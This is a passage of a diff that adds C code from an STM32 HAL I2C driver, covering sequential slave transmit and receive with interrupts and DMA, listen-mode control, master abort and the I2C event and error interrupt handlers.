I2C_OTHER_AND_LAST_FRAME) || (XferOptions == I2C_LAST_FRAME_NO_STOP)) + { + /* Enable Last DMA bit */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + } + } + if (hi2c->hdmarx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmarx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmarx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmarx->XferHalfCpltCallback = NULL; + hi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmarx, (uint32_t)&hi2c->Instance->DR, (uint32_t)hi2c->pBuffPtr, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + if (dmaxferstatus == HAL_OK) + { + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_RX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Update interrupt for only EVT and ERR */ + enableIT = (I2C_IT_EVT | I2C_IT_ERR); + } + else + { + /* Update interrupt for only ERR */ + enableIT = I2C_IT_ERR; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* If XferOptions is not associated to a new frame, mean no start bit is request, enable directly the DMA request */ + /* In other cases, DMA request is enabled after Slave address treatment in IRQHandler */ + if ((XferOptions == I2C_NEXT_FRAME) || (XferOptions == I2C_LAST_FRAME) || (XferOptions == I2C_LAST_FRAME_NO_STOP)) + { + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + } + + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, enableIT); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_RX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable interrupts */ + __HAL_I2C_ENABLE_IT(hi2c, enableIT); + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in slave mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Seq_Transmit_IT(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hi2c->State & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX_LISTEN; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in slave mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Seq_Transmit_DMA(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hi2c->State & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* I2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave RX state to TX state */ + if (hi2c->State == HAL_I2C_STATE_BUSY_RX_LISTEN) + { + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + /* Abort DMA Xfer if any */ + if (hi2c->hdmarx != NULL) + { + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmarx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmarx->XferAbortCallback(hi2c->hdmarx); + } + } + } + } + else if (hi2c->State == HAL_I2C_STATE_BUSY_TX_LISTEN) + { + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Abort DMA Xfer if any */ + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmatx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmatx->XferAbortCallback(hi2c->hdmatx); + } + } + } + } + else + { + /* Nothing to do */ + } + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX_LISTEN; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmatx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmatx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmatx->XferHalfCpltCallback = NULL; + hi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmatx, (uint32_t)hi2c->pBuffPtr, (uint32_t)&hi2c->Instance->DR, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_LISTEN; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Enable DMA Request */ + hi2c->Instance->CR2 |= I2C_CR2_DMAEN; + + return HAL_OK; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in slave mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Seq_Receive_IT(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hi2c->State & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX_LISTEN; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in slave mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Seq_Receive_DMA(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hi2c->State & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* I2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave RX state to TX state */ + if (hi2c->State == HAL_I2C_STATE_BUSY_RX_LISTEN) + { + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + /* Abort DMA Xfer if any */ + if (hi2c->hdmarx != NULL) + { + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmarx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmarx->XferAbortCallback(hi2c->hdmarx); + } + } + } + } + else if (hi2c->State == HAL_I2C_STATE_BUSY_TX_LISTEN) + { + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Abort DMA Xfer if any */ + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmatx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmatx->XferAbortCallback(hi2c->hdmatx); + } + } + } + } + else + { + /* Nothing to do */ + } + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX_LISTEN; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + + if (hi2c->hdmarx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmarx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmarx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmarx->XferHalfCpltCallback = NULL; + hi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmarx, (uint32_t)&hi2c->Instance->DR, (uint32_t)hi2c->pBuffPtr, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_LISTEN; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + return HAL_OK; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the Address listen mode with Interrupt. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_EnableListen_IT(I2C_HandleTypeDef *hi2c) +{ + if (hi2c->State == HAL_I2C_STATE_READY) + { + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Disable the Address listen mode with Interrupt. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_DisableListen_IT(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of tmp to prevent undefined behavior of volatile usage */ + uint32_t tmp; + + /* Disable Address listen mode only if a transfer is not ongoing */ + if (hi2c->State == HAL_I2C_STATE_LISTEN) + { + tmp = (uint32_t)(hi2c->State) & I2C_STATE_MSK; + hi2c->PreviousState = tmp | (uint32_t)(hi2c->Mode); + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Disable Address Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Disable EVT and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort a master I2C IT or DMA process communication with Interrupt. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Abort_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(DevAddress); + + /* Abort Master transfer during Receive or Transmit process */ + if ((__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET) && (CurrentMode == HAL_I2C_MODE_MASTER)) + { + /* Process Locked */ + __HAL_LOCK(hi2c); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_ABORT; + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->XferCount = 0U; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + I2C_ITError(hi2c); + + return HAL_OK; + } + else + { + /* Wrong usage of abort function */ + /* This function should be used only in case of abort monitored by master device */ + /* Or periphal is not in busy state, mean there is no active sequence to be abort */ + return HAL_ERROR; + } +} + +/** + * @} + */ + +/** @defgroup I2C_IRQ_Handler_and_Callbacks IRQ Handler and Callbacks + * @{ + */ + +/** + * @brief This function handles I2C event interrupt request. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +void HAL_I2C_EV_IRQHandler(I2C_HandleTypeDef *hi2c) +{ + uint32_t sr1itflags; + uint32_t sr2itflags = 0U; + uint32_t itsources = READ_REG(hi2c->Instance->CR2); + uint32_t CurrentXferOptions = hi2c->XferOptions; + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + /* Master or Memory mode selected */ + if ((CurrentMode == HAL_I2C_MODE_MASTER) || (CurrentMode == HAL_I2C_MODE_MEM)) + { + sr2itflags = READ_REG(hi2c->Instance->SR2); + sr1itflags = READ_REG(hi2c->Instance->SR1); + + /* Exit IRQ event until Start Bit detected in case of Other frame requested */ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_SB) == RESET) && (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(CurrentXferOptions) == 1U)) + { + return; + } + + /* SB Set ----------------------------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_SB) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + /* Convert OTHER_xxx XferOptions if any */ + I2C_ConvertOtherXferOptions(hi2c); + + I2C_Master_SB(hi2c); + } + /* ADD10 Set -------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_ADD10) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_Master_ADD10(hi2c); + } + /* ADDR Set --------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_ADDR) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_Master_ADDR(hi2c); + } + /* I2C in mode Transmitter -----------------------------------------------*/ + else if (I2C_CHECK_FLAG(sr2itflags, I2C_FLAG_TRA) != RESET) + { + /* Do not check buffer and BTF flag if a Xfer DMA is on going */ + if (READ_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN) != I2C_CR2_DMAEN) + { + /* TXE set and BTF reset -----------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_TXE) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_BUF) != RESET) && (I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) == RESET)) + { + I2C_MasterTransmit_TXE(hi2c); + } + /* BTF set -------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + if (CurrentState == HAL_I2C_STATE_BUSY_TX) + { + I2C_MasterTransmit_BTF(hi2c); + } + else /* HAL_I2C_MODE_MEM */ + { + if (CurrentMode == HAL_I2C_MODE_MEM) + { + I2C_MemoryTransmit_TXE_BTF(hi2c); + } + } + } + else + { + /* Do nothing */ + } + } + } + /* I2C in mode Receiver --------------------------------------------------*/ + else + { + /* Do not check buffer and BTF flag if a Xfer DMA is on going */ + if (READ_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN) != I2C_CR2_DMAEN) + { + /* RXNE set and BTF reset -----------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_RXNE) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_BUF) != RESET) && (I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) == RESET)) + { + I2C_MasterReceive_RXNE(hi2c); + } + /* BTF set -------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_MasterReceive_BTF(hi2c); + } + else + { + /* Do nothing */ + } + } + } + } + /* Slave mode selected */ + else + { + /* If an error is detected, read only SR1 register to prevent */ + /* a clear of ADDR flags by reading SR2 after reading SR1 in Error treatment */ + if (hi2c->ErrorCode != HAL_I2C_ERROR_NONE) + { + sr1itflags = READ_REG(hi2c->Instance->SR1); + } + else + { + sr2itflags = READ_REG(hi2c->Instance->SR2); + sr1itflags = READ_REG(hi2c->Instance->SR1); + } + + /* ADDR set --------------------------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_ADDR) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + /* Now time to read SR2, this will clear ADDR flag automatically */ + if (hi2c->ErrorCode != HAL_I2C_ERROR_NONE) + { + sr2itflags = READ_REG(hi2c->Instance->SR2); + } + I2C_Slave_ADDR(hi2c, sr2itflags); + } + /* STOPF set --------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_STOPF) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_Slave_STOPF(hi2c); + } + /* I2C in mode Transmitter -----------------------------------------------*/ + else if ((CurrentState == HAL_I2C_STATE_BUSY_TX) || (CurrentState == HAL_I2C_STATE_BUSY_TX_LISTEN)) + { + /* TXE set and BTF reset -----------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_TXE) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_BUF) != RESET) && (I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) == RESET)) + { + I2C_SlaveTransmit_TXE(hi2c); + } + /* BTF set -------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_SlaveTransmit_BTF(hi2c); + } + else + { + /* Do nothing */ + } + } + /* I2C in mode Receiver --------------------------------------------------*/ + else + { + /* RXNE set and BTF reset ----------------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_RXNE) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_BUF) != RESET) && (I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) == RESET)) + { + I2C_SlaveReceive_RXNE(hi2c); + } + /* BTF set -------------------------------------------------------------*/ + else if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BTF) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_EVT) != RESET)) + { + I2C_SlaveReceive_BTF(hi2c); + } + else + { + /* Do nothing */ + } + } + } +} + +/** + * @brief This function handles I2C error interrupt request. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +void HAL_I2C_ER_IRQHandler(I2C_HandleTypeDef *hi2c) +{ + HAL_I2C_ModeTypeDef tmp1; + uint32_t tmp2; + HAL_I2C_StateTypeDef tmp3; + uint32_t tmp4; + uint32_t sr1itflags = READ_REG(hi2c->Instance->SR1); + uint32_t itsources = READ_REG(hi2c->Instance->CR2); + uint32_t error = HAL_I2C_ERROR_NONE; + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + + /* I2C Bus error interrupt occurred ----------------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_BERR) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_ERR) != RESET)) + { + error |= HAL_I2C_ERROR_BERR; + + /* Clear BERR flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_BERR); + } + + /* I2C Arbitration Lost error interrupt occurred ---------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_ARLO) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_ERR) != RESET)) + { + error |= HAL_I2C_ERROR_ARLO; + + /* Clear ARLO flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_ARLO); + } + + /* I2C Acknowledge failure error interrupt occurred ------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_AF) != RESET) 